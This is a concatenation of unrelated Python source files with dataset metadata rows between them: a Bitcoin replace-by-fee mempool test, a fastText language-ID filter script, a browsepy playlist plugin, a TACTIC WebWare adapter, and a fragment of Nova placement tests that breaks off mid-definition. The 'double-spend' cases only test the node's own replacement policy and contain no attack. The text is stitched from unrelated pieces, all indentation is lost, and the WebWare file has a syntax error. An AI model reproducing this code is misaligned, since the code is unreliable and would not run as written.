txid = node.sendrawtransaction(signed_tx['hex'], True)
# If requested, ensure txouts are confirmed.
if confirmed:
mempool_size = len(node.getrawmempool())
while mempool_size > 0:
node.generate(1)
new_size = len(node.getrawmempool())
# Error out if we have something stuck in the mempool, as this
# would likely be a bug.
assert(new_size < mempool_size)
mempool_size = new_size
return COutPoint(int(txid, 16), 0)
class ReplaceByFeeTest(BitcoinTestFramework):
def __init__(self):
super().__init__()
self.num_nodes = 1
self.setup_clean_chain = False
def setup_network(self):
self.nodes = []
self.nodes.append(start_node(0, self.options.tmpdir, ["-maxorphantx=1000", "-debug",
"-relaypriority=0", "-whitelist=127.0.0.1",
"-limitancestorcount=50",
"-limitancestorsize=101",
"-limitdescendantcount=200",
"-limitdescendantsize=101"
]))
self.is_network_split = False
def run_test(self):
make_utxo(self.nodes[0], 1*COIN)
print("Running test simple doublespend...")
self.test_simple_doublespend()
print("Running test doublespend chain...")
self.test_doublespend_chain()
print("Running test doublespend tree...")
self.test_doublespend_tree()
print("Running test replacement feeperkb...")
self.test_replacement_feeperkb()
print("Running test spends of conflicting outputs...")
self.test_spends_of_conflicting_outputs()
print("Running test new unconfirmed inputs...")
self.test_new_unconfirmed_inputs()
print("Running test too many replacements...")
self.test_too_many_replacements()
print("Running test opt-in...")
self.test_opt_in()
print("Running test prioritised transactions...")
self.test_prioritised_transactions()
print("Passed\n")
def test_simple_doublespend(self):
"""Simple doublespend"""
tx0_outpoint = make_utxo(self.nodes[0], int(1.1*COIN))
tx1a = CTransaction()
tx1a.vin = [CTxIn(tx0_outpoint, nSequence=0)]
tx1a.vout = [CTxOut(1*COIN, CScript([b'a']))]
tx1a_hex = txToHex(tx1a)
tx1a_txid = self.nodes[0].sendrawtransaction(tx1a_hex, True)
# Should fail because we haven't changed the fee
tx1b = CTransaction()
tx1b.vin = [CTxIn(tx0_outpoint, nSequence=0)]
tx1b.vout = [CTxOut(1*COIN, CScript([b'b']))]
tx1b_hex = txToHex(tx1b)
try:
tx1b_txid = self.nodes[0].sendrawtransaction(tx1b_hex, True)
except JSONRPCException as exp:
assert_equal(exp.error['code'], -26) # insufficient fee
else:
assert(False)
# Extra 0.1 BTC fee
tx1b = CTransaction()
tx1b.vin = [CTxIn(tx0_outpoint, nSequence=0)]
tx1b.vout = [CTxOut(int(0.9*COIN), CScript([b'b']))]
tx1b_hex = txToHex(tx1b)
tx1b_txid = self.nodes[0].sendrawtransaction(tx1b_hex, True)
mempool = self.nodes[0].getrawmempool()
assert (tx1a_txid not in mempool)
assert (tx1b_txid in mempool)
assert_equal(tx1b_hex, self.nodes[0].getrawtransaction(tx1b_txid))
def test_doublespend_chain(self):
"""Doublespend of a long chain"""
initial_nValue = 50*COIN
tx0_outpoint = make_utxo(self.nodes[0], initial_nValue)
prevout = tx0_outpoint
remaining_value = initial_nValue
chain_txids = []
while remaining_value > 10*COIN:
remaining_value -= 1*COIN
tx = CTransaction()
tx.vin = [CTxIn(prevout, nSequence=0)]
tx.vout = [CTxOut(remaining_value, CScript([1]))]
tx_hex = txToHex(tx)
txid = self.nodes[0].sendrawtransaction(tx_hex, True)
chain_txids.append(txid)
prevout = COutPoint(int(txid, 16), 0)
# Whether the double-spend is allowed is evaluated by including all
# child fees - 40 BTC - so this attempt is rejected.
dbl_tx = CTransaction()
dbl_tx.vin = [CTxIn(tx0_outpoint, nSequence=0)]
dbl_tx.vout = [CTxOut(initial_nValue - 30*COIN, CScript([1]))]
dbl_tx_hex = txToHex(dbl_tx)
try:
self.nodes[0].sendrawtransaction(dbl_tx_hex, True)
except JSONRPCException as exp:
assert_equal(exp.error['code'], -26) # insufficient fee
else:
assert(False) # transaction mistakenly accepted!
# Accepted with sufficient fee
dbl_tx = CTransaction()
dbl_tx.vin = [CTxIn(tx0_outpoint, nSequence=0)]
dbl_tx.vout = [CTxOut(1*COIN, CScript([1]))]
dbl_tx_hex = txToHex(dbl_tx)
self.nodes[0].sendrawtransaction(dbl_tx_hex, True)
mempool = self.nodes[0].getrawmempool()
for doublespent_txid in chain_txids:
assert(doublespent_txid not in mempool)
def test_doublespend_tree(self):
"""Doublespend of a big tree of transactions"""
initial_nValue = 50*COIN
tx0_outpoint = make_utxo(self.nodes[0], initial_nValue)
def branch(prevout, initial_value, max_txs, tree_width=5, fee=0.0001*COIN, _total_txs=None):
if _total_txs is None:
_total_txs = [0]
if _total_txs[0] >= max_txs:
return
txout_value = (initial_value - fee) // tree_width
if txout_value < fee:
return
vout = [CTxOut(txout_value, CScript([i+1]))
for i in range(tree_width)]
tx = CTransaction()
tx.vin = [CTxIn(prevout, nSequence=0)]
tx.vout = vout
tx_hex = txToHex(tx)
assert(len(tx.serialize()) < 100000)
txid = self.nodes[0].sendrawtransaction(tx_hex, True)
yield tx
_total_txs[0] += 1
txid = int(txid, 16)
for i, txout in enumerate(tx.vout):
for x in branch(COutPoint(txid, i), txout_value,
max_txs,
tree_width=tree_width, fee=fee,
_total_txs=_total_txs):
yield x
fee = int(0.0001*COIN)
n = MAX_REPLACEMENT_LIMIT
tree_txs = list(branch(tx0_outpoint, initial_nValue, n, fee=fee))
assert_equal(len(tree_txs), n)
# Attempt double-spend, will fail because too little fee paid
dbl_tx = CTransaction()
dbl_tx.vin = [CTxIn(tx0_outpoint, nSequence=0)]
dbl_tx.vout = [CTxOut(initial_nValue - fee*n, CScript([1]))]
dbl_tx_hex = txToHex(dbl_tx)
try:
self.nodes[0].sendrawtransaction(dbl_tx_hex, True)
except JSONRPCException as exp:
assert_equal(exp.error['code'], -26) # insufficient fee
else:
assert(False)
# 1 BTC fee is enough
dbl_tx = CTransaction()
dbl_tx.vin = [CTxIn(tx0_outpoint, nSequence=0)]
dbl_tx.vout = [CTxOut(initial_nValue - fee*n - 1*COIN, CScript([1]))]
dbl_tx_hex = txToHex(dbl_tx)
self.nodes[0].sendrawtransaction(dbl_tx_hex, True)
mempool = self.nodes[0].getrawmempool()
for tx in tree_txs:
tx.rehash()
assert (tx.hash not in mempool)
# Try again, but with more total transactions than the "max txs
# double-spent at once" anti-DoS limit.
for n in (MAX_REPLACEMENT_LIMIT+1, MAX_REPLACEMENT_LIMIT*2):
fee = int(0.0001*COIN)
tx0_outpoint = make_utxo(self.nodes[0], initial_nValue)
tree_txs = list(branch(tx0_outpoint, initial_nValue, n, fee=fee))
assert_equal(len(tree_txs), n)
dbl_tx = CTransaction()
dbl_tx.vin = [CTxIn(tx0_outpoint, nSequence=0)]
dbl_tx.vout = [CTxOut(initial_nValue - 2*fee*n, CScript([1]))]
dbl_tx_hex = txToHex(dbl_tx)
try:
self.nodes[0].sendrawtransaction(dbl_tx_hex, True)
except JSONRPCException as exp:
assert_equal(exp.error['code'], -26)
assert_equal("too many potential replacements" in exp.error['message'], True)
else:
assert(False)
for tx in tree_txs:
tx.rehash()
self.nodes[0].getrawtransaction(tx.hash)
def test_replacement_feeperkb(self):
"""Replacement requires fee-per-KB to be higher"""
tx0_outpoint = make_utxo(self.nodes[0], int(1.1*COIN))
tx1a = CTransaction()
tx1a.vin = [CTxIn(tx0_outpoint, nSequence=0)]
tx1a.vout = [CTxOut(1*COIN, CScript([b'a']))]
tx1a_hex = txToHex(tx1a)
tx1a_txid = self.nodes[0].sendrawtransaction(tx1a_hex, True)
# Higher fee, but the fee per KB is much lower, so the replacement is
# rejected.
tx1b = CTransaction()
tx1b.vin = [CTxIn(tx0_outpoint, nSequence=0)]
tx1b.vout = [CTxOut(int(0.001*COIN), CScript([b'a'*999000]))]
tx1b_hex = txToHex(tx1b)
try:
tx1b_txid = self.nodes[0].sendrawtransaction(tx1b_hex, True)
except JSONRPCException as exp:
assert_equal(exp.error['code'], -26) # insufficient fee
else:
assert(False)
def test_spends_of_conflicting_outputs(self):
"""Replacements that spend conflicting tx outputs are rejected"""
utxo1 = make_utxo(self.nodes[0], int(1.2*COIN))
utxo2 = make_utxo(self.nodes[0], 3*COIN)
tx1a = CTransaction()
tx1a.vin = [CTxIn(utxo1, nSequence=0)]
tx1a.vout = [CTxOut(int(1.1*COIN), CScript([b'a']))]
tx1a_hex = txToHex(tx1a)
tx1a_txid = self.nodes[0].sendrawtransaction(tx1a_hex, True)
tx1a_txid = int(tx1a_txid, 16)
# Direct spend an output of the transaction we're replacing.
tx2 = CTransaction()
tx2.vin = [CTxIn(utxo1, nSequence=0), CTxIn(utxo2, nSequence=0)]
tx2.vin.append(CTxIn(COutPoint(tx1a_txid, 0), nSequence=0))
tx2.vout = tx1a.vout
tx2_hex = txToHex(tx2)
try:
tx2_txid = self.nodes[0].sendrawtransaction(tx2_hex, True)
except JSONRPCException as exp:
assert_equal(exp.error['code'], -26)
else:
assert(False)
# Spend tx1a's output to test the indirect case.
tx1b = CTransaction()
tx1b.vin = [CTxIn(COutPoint(tx1a_txid, 0), nSequence=0)]
tx1b.vout = [CTxOut(1*COIN, CScript([b'a']))]
tx1b_hex = txToHex(tx1b)
tx1b_txid = self.nodes[0].sendrawtransaction(tx1b_hex, True)
tx1b_txid = int(tx1b_txid, 16)
tx2 = CTransaction()
tx2.vin = [CTxIn(utxo1, nSequence=0), CTxIn(utxo2, nSequence=0),
CTxIn(COutPoint(tx1b_txid, 0))]
tx2.vout = tx1a.vout
tx2_hex = txToHex(tx2)
try:
tx2_txid = self.nodes[0].sendrawtransaction(tx2_hex, True)
except JSONRPCException as exp:
assert_equal(exp.error['code'], -26)
else:
assert(False)
def test_new_unconfirmed_inputs(self):
"""Replacements that add new unconfirmed inputs are rejected"""
confirmed_utxo = make_utxo(self.nodes[0], int(1.1*COIN))
unconfirmed_utxo = make_utxo(self.nodes[0], int(0.1*COIN), False)
tx1 = CTransaction()
tx1.vin = [CTxIn(confirmed_utxo)]
tx1.vout = [CTxOut(1*COIN, CScript([b'a']))]
tx1_hex = txToHex(tx1)
tx1_txid = self.nodes[0].sendrawtransaction(tx1_hex, True)
tx2 = CTransaction()
tx2.vin = [CTxIn(confirmed_utxo), CTxIn(unconfirmed_utxo)]
tx2.vout = tx1.vout
tx2_hex = txToHex(tx2)
try:
tx2_txid = self.nodes[0].sendrawtransaction(tx2_hex, True)
except JSONRPCException as exp:
assert_equal(exp.error['code'], -26)
else:
assert(False)
def test_too_many_replacements(self):
"""Replacements that evict too many transactions are rejected"""
# Try directly replacing more than MAX_REPLACEMENT_LIMIT
# transactions
# Start by creating a single transaction with many outputs
initial_nValue = 10*COIN
utxo = make_utxo(self.nodes[0], initial_nValue)
fee = int(0.0001*COIN)
split_value = int((initial_nValue-fee)/(MAX_REPLACEMENT_LIMIT+1))
actual_fee = initial_nValue - split_value*(MAX_REPLACEMENT_LIMIT+1)
outputs = []
for i in range(MAX_REPLACEMENT_LIMIT+1):
outputs.append(CTxOut(split_value, CScript([1])))
splitting_tx = CTransaction()
splitting_tx.vin = [CTxIn(utxo, nSequence=0)]
splitting_tx.vout = outputs
splitting_tx_hex = txToHex(splitting_tx)
txid = self.nodes[0].sendrawtransaction(splitting_tx_hex, True)
txid = int(txid, 16)
# Now spend each of those outputs individually
for i in range(MAX_REPLACEMENT_LIMIT+1):
tx_i = CTransaction()
tx_i.vin = [CTxIn(COutPoint(txid, i), nSequence=0)]
tx_i.vout = [CTxOut(split_value-fee, CScript([b'a']))]
tx_i_hex = txToHex(tx_i)
self.nodes[0].sendrawtransaction(tx_i_hex, True)
# Now create doublespend of the whole lot; should fail.
# Need a big enough fee to cover all spending transactions and have
# a higher fee rate
double_spend_value = (split_value-100*fee)*(MAX_REPLACEMENT_LIMIT+1)
inputs = []
for i in range(MAX_REPLACEMENT_LIMIT+1):
inputs.append(CTxIn(COutPoint(txid, i), nSequence=0))
double_tx = CTransaction()
double_tx.vin = inputs
double_tx.vout = [CTxOut(double_spend_value, CScript([b'a']))]
double_tx_hex = txToHex(double_tx)
try:
self.nodes[0].sendrawtransaction(double_tx_hex, True)
except JSONRPCException as exp:
assert_equal(exp.error['code'], -26)
assert_equal("too many potential replacements" in exp.error['message'], True)
else:
assert(False)
# If we remove an input, it should pass
double_tx = CTransaction()
double_tx.vin = inputs[0:-1]
double_tx.vout = [CTxOut(double_spend_value, CScript([b'a']))]
double_tx_hex = txToHex(double_tx)
self.nodes[0].sendrawtransaction(double_tx_hex, True)
def test_opt_in(self):
""" Replacing should only work if orig tx opted in """
tx0_outpoint = make_utxo(self.nodes[0], int(1.1*COIN))
# Create a non-opting in transaction
tx1a = CTransaction()
tx1a.vin = [CTxIn(tx0_outpoint, nSequence=0xffffffff)]
tx1a.vout = [CTxOut(1*COIN, CScript([b'a']))]
tx1a_hex = txToHex(tx1a)
tx1a_txid = self.nodes[0].sendrawtransaction(tx1a_hex, True)
# Shouldn't be able to double-spend
tx1b = CTransaction()
tx1b.vin = [CTxIn(tx0_outpoint, nSequence=0)]
tx1b.vout = [CTxOut(int(0.9*COIN), CScript([b'b']))]
tx1b_hex = txToHex(tx1b)
try:
tx1b_txid = self.nodes[0].sendrawtransaction(tx1b_hex, True)
except JSONRPCException as exp:
assert_equal(exp.error['code'], -26)
else:
print(tx1b_txid)
assert(False)
tx1_outpoint = make_utxo(self.nodes[0], int(1.1*COIN))
# Create a different non-opting in transaction
tx2a = CTransaction()
tx2a.vin = [CTxIn(tx1_outpoint, nSequence=0xfffffffe)]
tx2a.vout = [CTxOut(1*COIN, CScript([b'a']))]
tx2a_hex = txToHex(tx2a)
tx2a_txid = self.nodes[0].sendrawtransaction(tx2a_hex, True)
# Still shouldn't be able to double-spend
tx2b = CTransaction()
tx2b.vin = [CTxIn(tx1_outpoint, nSequence=0)]
tx2b.vout = [CTxOut(int(0.9*COIN), CScript([b'b']))]
tx2b_hex = txToHex(tx2b)
try:
tx2b_txid = self.nodes[0].sendrawtransaction(tx2b_hex, True)
except JSONRPCException as exp:
assert_equal(exp.error['code'], -26)
else:
assert(False)
# Now create a new transaction that spends from tx1a and tx2a
# opt-in on one of the inputs
# Transaction should be replaceable on either input
tx1a_txid = int(tx1a_txid, 16)
tx2a_txid = int(tx2a_txid, 16)
tx3a = CTransaction()
tx3a.vin = [CTxIn(COutPoint(tx1a_txid, 0), nSequence=0xffffffff),
CTxIn(COutPoint(tx2a_txid, 0), nSequence=0xfffffffd)]
tx3a.vout = [CTxOut(int(0.9*COIN), CScript([b'c'])), CTxOut(int(0.9*COIN), CScript([b'd']))]
tx3a_hex = txToHex(tx3a)
self.nodes[0].sendrawtransaction(tx3a_hex, True)
tx3b = CTransaction()
tx3b.vin = [CTxIn(COutPoint(tx1a_txid, 0), nSequence=0)]
tx3b.vout = [CTxOut(int(0.5*COIN), CScript([b'e']))]
tx3b_hex = txToHex(tx3b)
tx3c = CTransaction()
tx3c.vin = [CTxIn(COutPoint(tx2a_txid, 0), nSequence=0)]
tx3c.vout = [CTxOut(int(0.5*COIN), CScript([b'f']))]
tx3c_hex = txToHex(tx3c)
self.nodes[0].sendrawtransaction(tx3b_hex, True)
# If tx3b was accepted, tx3c won't look like a replacement,
# but make sure it is accepted anyway
self.nodes[0].sendrawtransaction(tx3c_hex, True)
def test_prioritised_transactions(self):
# Ensure that fee deltas used via prioritisetransaction are
# correctly used by replacement logic
# 1. Check that feeperkb uses modified fees
tx0_outpoint = make_utxo(self.nodes[0], int(1.1*COIN))
tx1a = CTransaction()
tx1a.vin = [CTxIn(tx0_outpoint, nSequence=0)]
tx1a.vout = [CTxOut(1*COIN, CScript([b'a']))]
tx1a_hex = txToHex(tx1a)
tx1a_txid = self.nodes[0].sendrawtransaction(tx1a_hex, True)
# Higher fee, but the actual fee per KB is much lower.
tx1b = CTransaction()
tx1b.vin = [CTxIn(tx0_outpoint, nSequence=0)]
tx1b.vout = [CTxOut(int(0.001*COIN), CScript([b'a'*740000]))]
tx1b_hex = txToHex(tx1b)
# Verify tx1b cannot replace tx1a.
try:
tx1b_txid = self.nodes[0].sendrawtransaction(tx1b_hex, True)
except JSONRPCException as exp:
assert_equal(exp.error['code'], -26)
else:
assert(False)
# Use prioritisetransaction to set tx1a's fee to 0.
self.nodes[0].prioritisetransaction(txid=tx1a_txid, fee_delta=int(-0.1*COIN))
# Now tx1b should be able to replace tx1a
tx1b_txid = self.nodes[0].sendrawtransaction(tx1b_hex, True)
assert(tx1b_txid in self.nodes[0].getrawmempool())
# 2. Check that absolute fee checks use modified fee.
tx1_outpoint = make_utxo(self.nodes[0], int(1.1*COIN))
tx2a = CTransaction()
tx2a.vin = [CTxIn(tx1_outpoint, nSequence=0)]
tx2a.vout = [CTxOut(1*COIN, CScript([b'a']))]
tx2a_hex = txToHex(tx2a)
tx2a_txid = self.nodes[0].sendrawtransaction(tx2a_hex, True)
# Lower fee, but we'll prioritise it
tx2b = CTransaction()
tx2b.vin = [CTxIn(tx1_outpoint, nSequence=0)]
tx2b.vout = [CTxOut(int(1.01*COIN), CScript([b'a']))]
tx2b.rehash()
tx2b_hex = txToHex(tx2b)
# Verify tx2b cannot replace tx2a.
try:
tx2b_txid = self.nodes[0].sendrawtransaction(tx2b_hex, True)
except JSONRPCException as exp:
assert_equal(exp.error['code'], -26)
else:
assert(False)
# Now prioritise tx2b to have a higher modified fee
self.nodes[0].prioritisetransaction(txid=tx2b.hash, fee_delta=int(0.1*COIN))
# tx2b should now be accepted
tx2b_txid = self.nodes[0].sendrawtransaction(tx2b_hex, True)
assert(tx2b_txid in self.nodes[0].getrawmempool())
if __name__ == '__main__':
ReplaceByFeeTest().main()
| mit | 5,439,684,677,800,086,000 | 36.327119 | 105 | 0.5823 | false |
pytorch/fairseq | examples/multilingual/data_scripts/utils/fasttext_multi_filter.py | 1 | 2340 | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
#!/bin/python
import fasttext
from multiprocessing import Pool
import contextlib
import sys
import argparse
from functools import partial
import io
model = None
def init(model_path):
global model
model = fasttext.load_model(model_path)
def pred(lines):
return lines, [model.predict(line.strip())[0][0][9:] for line in lines]
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--model", type=str, required=True,
help="model to load")
parser.add_argument("--inputs", nargs="+", default=['-'],
help="input files to filter")
parser.add_argument("--langs", nargs="+", required=True,
help="lang ids of each input file")
parser.add_argument("--outputs", nargs="+", default=['-'],
help="path to save lid filtered outputs")
parser.add_argument("--num-workers", type=int, metavar="N", default=10,
help="number of processes in parallel")
args = parser.parse_args()
assert len(args.inputs) == len(args.langs) and len(args.inputs) == len(args.outputs)
with contextlib.ExitStack() as stack:
inputs = [
stack.enter_context(open(input, "r", encoding="utf-8", newline="\n", errors="replace"))
if input != "-" else io.TextIOWrapper(sys.stdin.buffer, encoding='utf-8', errors="replace")
for input in args.inputs
]
outputs = [
stack.enter_context(open(output, "w", encoding="utf-8", newline="\n"))
if output != "-" else sys.stdout
for output in args.outputs
]
with Pool(args.num_workers, initializer=partial(init, args.model)) as p:
skip_cnt = 0
for lines, preds in p.imap(pred, list(zip(*inputs)), chunksize=500):
if not all(a == b for a, b in zip(preds, args.langs)):
skip_cnt += 1
continue
for line, output_h in zip(lines, outputs):
print(line.strip(), file=output_h)
print(f"Skipped {skip_cnt} lines.")
if __name__ == "__main__":
main()
| mit | -9,120,572,381,256,521,000 | 36.142857 | 107 | 0.584188 | false |
dolphx/browsepy | browsepy/plugin/player/playable.py | 1 | 7332 |
import sys
import codecs
import os.path
import warnings
from browsepy.compat import range, PY_LEGACY # noqa
from browsepy.file import Node, File, Directory, \
underscore_replace, check_under_base
if PY_LEGACY:
import ConfigParser as configparser
else:
import configparser
ConfigParserBase = (
configparser.SafeConfigParser
if hasattr(configparser, 'SafeConfigParser') else
configparser.ConfigParser
)
class PLSFileParser(object):
'''
ConfigParser wrapper accepting fallback on get for convenience.
This wraps instead of inheriting due ConfigParse being classobj on python2.
'''
NOT_SET = type('NotSetType', (object,), {})
parser_class = (
configparser.SafeConfigParser
if hasattr(configparser, 'SafeConfigParser') else
configparser.ConfigParser
)
def __init__(self, path):
with warnings.catch_warnings():
# We already know about SafeConfigParser deprecation!
warnings.filterwarnings('ignore', category=DeprecationWarning)
self._parser = self.parser_class()
self._parser.read(path)
def getint(self, section, key, fallback=NOT_SET):
try:
return self._parser.getint(section, key)
except (configparser.NoOptionError, ValueError):
if fallback is self.NOT_SET:
raise
return fallback
def get(self, section, key, fallback=NOT_SET):
try:
return self._parser.get(section, key)
except (configparser.NoOptionError, ValueError):
if fallback is self.NOT_SET:
raise
return fallback
class PlayableBase(File):
extensions = {
'mp3': 'audio/mpeg',
'ogg': 'audio/ogg',
'wav': 'audio/wav',
'm3u': 'audio/x-mpegurl',
'm3u8': 'audio/x-mpegurl',
'pls': 'audio/x-scpls',
}
@classmethod
def extensions_from_mimetypes(cls, mimetypes):
mimetypes = frozenset(mimetypes)
return {
ext: mimetype
for ext, mimetype in cls.extensions.items()
if mimetype in mimetypes
}
@classmethod
def detect(cls, node, os_sep=os.sep):
basename = node.path.rsplit(os_sep)[-1]
if '.' in basename:
ext = basename.rsplit('.')[-1]
return cls.extensions.get(ext, None)
return None
class PlayableFile(PlayableBase):
mimetypes = ['audio/mpeg', 'audio/ogg', 'audio/wav']
extensions = PlayableBase.extensions_from_mimetypes(mimetypes)
media_map = {mime: ext for ext, mime in extensions.items()}
def __init__(self, **kwargs):
self.duration = kwargs.pop('duration', None)
self.title = kwargs.pop('title', None)
super(PlayableFile, self).__init__(**kwargs)
@property
def title(self):
return self._title or self.name
@title.setter
def title(self, title):
self._title = title
@property
def media_format(self):
return self.media_map[self.type]
class PlayListFile(PlayableBase):
playable_class = PlayableFile
mimetypes = ['audio/x-mpegurl', 'audio/x-mpegurl', 'audio/x-scpls']
extensions = PlayableBase.extensions_from_mimetypes(mimetypes)
@classmethod
def from_urlpath(cls, path, app=None):
original = Node.from_urlpath(path, app)
if original.mimetype == PlayableDirectory.mimetype:
return PlayableDirectory(original.path, original.app)
elif original.mimetype == M3UFile.mimetype:
return M3UFile(original.path, original.app)
if original.mimetype == PLSFile.mimetype:
return PLSFile(original.path, original.app)
return original
def normalize_playable_path(self, path):
if '://' in path:
return path
if not os.path.isabs(path):
return os.path.normpath(os.path.join(self.parent.path, path))
if check_under_base(path, self.app.config['directory_base']):
return os.path.normpath(path)
return None
def _entries(self):
return
yield # noqa
def entries(self):
for file in self._entries():
if PlayableFile.detect(file):
yield file
class PLSFile(PlayListFile):
ini_parser_class = PLSFileParser
maxsize = getattr(sys, 'maxsize', None) or getattr(sys, 'maxint', None)
mimetype = 'audio/x-scpls'
extensions = PlayableBase.extensions_from_mimetypes([mimetype])
def _entries(self):
parser = self.ini_parser_class(self.path)
maxsize = parser.getint('playlist', 'NumberOfEntries', None)
for i in range(1, self.maxsize if maxsize is None else maxsize + 1):
path = parser.get('playlist', 'File%d' % i, None)
if not path:
if maxsize:
continue
break
path = self.normalize_playable_path(path)
if not path:
continue
yield self.playable_class(
path=path,
app=self.app,
duration=parser.getint(
'playlist', 'Length%d' % i,
None
),
title=parser.get(
'playlist',
'Title%d' % i,
None
),
)
class M3UFile(PlayListFile):
mimetype = 'audio/x-mpegurl'
extensions = PlayableBase.extensions_from_mimetypes([mimetype])
def _iter_lines(self):
prefix = '#EXTM3U\n'
encoding = 'utf-8' if self.path.endswith('.m3u8') else 'ascii'
with codecs.open(
self.path, 'r',
encoding=encoding,
errors=underscore_replace
) as f:
if f.read(len(prefix)) != prefix:
f.seek(0)
for line in f:
line = line.rstrip('\n')
if line:
yield line
def _entries(self):
data = {}
for line in self._iter_lines():
if line.startswith('#EXTINF:'):
duration, title = line.split(',', 1)
data['duration'] = None if duration == '-1' else int(duration)
data['title'] = title
if not line:
continue
path = self.normalize_playable_path(line)
if path:
yield self.playable_class(path=path, app=self.app, **data)
data.clear()
class PlayableDirectory(Directory):
file_class = PlayableFile
name = ''
@property
def parent(self):
return super(PlayableDirectory, self) # parent is self as directory
@classmethod
def detect(cls, node):
if node.is_directory:
for file in node._listdir():
if PlayableFile.detect(file):
return cls.mimetype
return None
def entries(self):
for file in super(PlayableDirectory, self)._listdir():
if PlayableFile.detect(file):
yield file
def detect_playable_mimetype(path, os_sep=os.sep):
basename = path.rsplit(os_sep)[-1]
if '.' in basename:
ext = basename.rsplit('.')[-1]
return PlayableBase.extensions.get(ext, None)
return None
| mit | 1,423,550,198,939,433,700 | 29.423237 | 79 | 0.575286 | false |
Southpaw-TACTIC/TACTIC | src/pyasm/web/webware_adapter.py | 1 | 4985 | ###########################################################
#
# Copyright (c) 2005, Southpaw Technology
# All Rights Reserved
#
# PROPRIETARY INFORMATION. This software is proprietary to
# Southpaw Technology, and is not to be reproduced, transmitted,
# or disclosed in any way without written permission.
#
#
#
#
# DEPRECATED
#
__all__ = ['get_app_server', 'get_xmlrpc_server', 'WebWareException', 'WebWare', 'WebWareXmlrpcAdapter']
import types, os
from WebKit.Page import Page
from pyasm.common import Config
from pyasm.web import Url
from web_environment import *
class WebWareException(Exception):
pass
def get_app_server():
'''dynamically load in the appserver classes'''
from app_server import BaseAppServer
from WebKit.Page import Page
class AppServer(Page, BaseAppServer):
def get_adapter(self):
adapter = WebWare(self)
return adapter
def writeHTML(self):
self.writeln( self.get_display() )
return AppServer
def get_xmlrpc_server():
'''dynamically load in an xmlrpc server'''
from WebKit.XMLRPCServlet import XMLRPCServlet
class XmlrpcServer(XMLRPCServlet):
def get_adapter(self):
adapter = WebWareXmlrpcAdapter(self.transaction())
return adapter
return XmlrpcServer
class WebWare(WebEnvironment):
"""Encapsulates webware environment. Implements the web interface"""
def __init__(self,page):
super(WebWare,self).__init__()
self.request = page.request()
self.response = page.response()
def get_context_name(self):
'''this includes all of the subdirectories as well as the main
context'''
dir = self.request.urlPathDir()
# strip of the / at the front and the back
dir = dir.rstrip("/")
dir = dir.lstrip("/")
return dir
# form submission methods
#def reset_form(self):
# return self.request.fields() = {}
def get_form_keys(self):
return self.request.fields().keys()
def has_form_key(self, key):
return key in self.request.fields():
def set_form_value(self, name, value):
'''Set the form value to appear like it was submitted'''
self.request.setField(name, value)
def get_form_values(self, name, raw=False):
"""returns a string list of the values of a form element.
If raw is True, then a nonexistant value returns None"""
if self.request.hasValue(name):
values = self.request.value(name)
if isinstance(values, basestring):
values = values.decode('utf-8')
values = self._process_unicode(values)
return [values]
elif isinstance(values, list):
new_values = []
for value in values:
if isinstance(value, basestring):
value = self._process_unicode(value.decode('utf-8'))
new_values.append(value)
return new_values
else: # this can be a FieldStorage instance
return values
else:
if raw == True:
return None
else:
return []
def get_form_value(self, name, raw=False):
"""returns the string value of the form element.
If raw is True, then a nonexistant value returns None"""
values = self.get_form_values(name,raw)
if values == None:
return None
if values.__class__.__name__ == "FieldStorage":
return values
elif len(values) > 0:
return values[0]
else:
return ""
def _process_unicode(self, value):
try:
value = value.encode("ascii")
except:
chars = []
for char in value:
ord_value = ord(char)
if ord_value > 128:
chars.append("&#%s;" % ord(char) )
else:
chars.append(char)
value = "".join(chars)
return value
# cookie methods
def set_cookie(self, name, value):
"""set a cookie"""
self.response.setCookie(name, value, expires="NEVER")
def get_cookie(self, name):
"""get a cookie"""
if self.request.hasCookie(name):
return self.request.cookie(name)
else:
return ""
# environment methods
def get_env_keys(self):
env = self.request.environ()
return env.keys()
def get_env(self, env_var):
env = self.request.environ()
return env.get(env_var)
class WebWareXmlrpcAdapter(WebWare):
def __init__(self, transaction):
# NOTE: the call to WebWare's super is intentional
super(WebWare,self).__init__()
self.request = transaction.request()
self.response = transaction.response()
| epl-1.0 | 7,359,882,747,816,298,000 | 23.800995 | 104 | 0.566901 | false |
phenoxim/nova | nova/tests/unit/api/openstack/placement/test_handler.py | 1 | 7223 | # All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Unit tests for the functions used by the placement API handlers."""
import microversion_parse
import mock
import routes
import webob
from nova.api.openstack.placement import handler
from nova.api.openstack.placement.handlers import root
from nova.api.openstack.placement import microversion
from nova import test
from nova.tests import uuidsentinel
# Used in tests below
def start_response(*args, **kwargs):
pass
def _environ(path='/moo', method='GET'):
return {
'PATH_INFO': path,
'REQUEST_METHOD': method,
'SERVER_NAME': 'example.com',
'SERVER_PORT': '80',
'wsgi.url_scheme': 'http',
# The microversion version value is not used, but it
# needs to be set to avoid a KeyError.
microversion.MICROVERSION_ENVIRON: microversion_parse.Version(1, 12),
}
class DispatchTest(test.NoDBTestCase):
def setUp(self):
super(DispatchTest, self).setUp()
self.mapper = routes.Mapper()
self.route_handler = mock.MagicMock()
def test_no_match_null_map(self):
self.assertRaises(webob.exc.HTTPNotFound,
handler.dispatch,
_environ(), start_response,
self.mapper)
def test_no_match_with_map(self):
self.mapper.connect('/foobar', action='hello')
self.assertRaises(webob.exc.HTTPNotFound,
handler.dispatch,
_environ(), start_response,
self.mapper)
def test_simple_match(self):
self.mapper.connect('/foobar', action=self.route_handler,
conditions=dict(method=['GET']))
environ = _environ(path='/foobar')
handler.dispatch(environ, start_response, self.mapper)
self.route_handler.assert_called_with(environ, start_response)
def test_simple_match_routing_args(self):
self.mapper.connect('/foobar/{id}', action=self.route_handler,
conditions=dict(method=['GET']))
environ = _environ(path='/foobar/%s' % uuidsentinel.foobar)
handler.dispatch(environ, start_response, self.mapper)
self.route_handler.assert_called_with(environ, start_response)
self.assertEqual(uuidsentinel.foobar,
environ['wsgiorg.routing_args'][1]['id'])
class MapperTest(test.NoDBTestCase):
def setUp(self):
super(MapperTest, self).setUp()
declarations = {
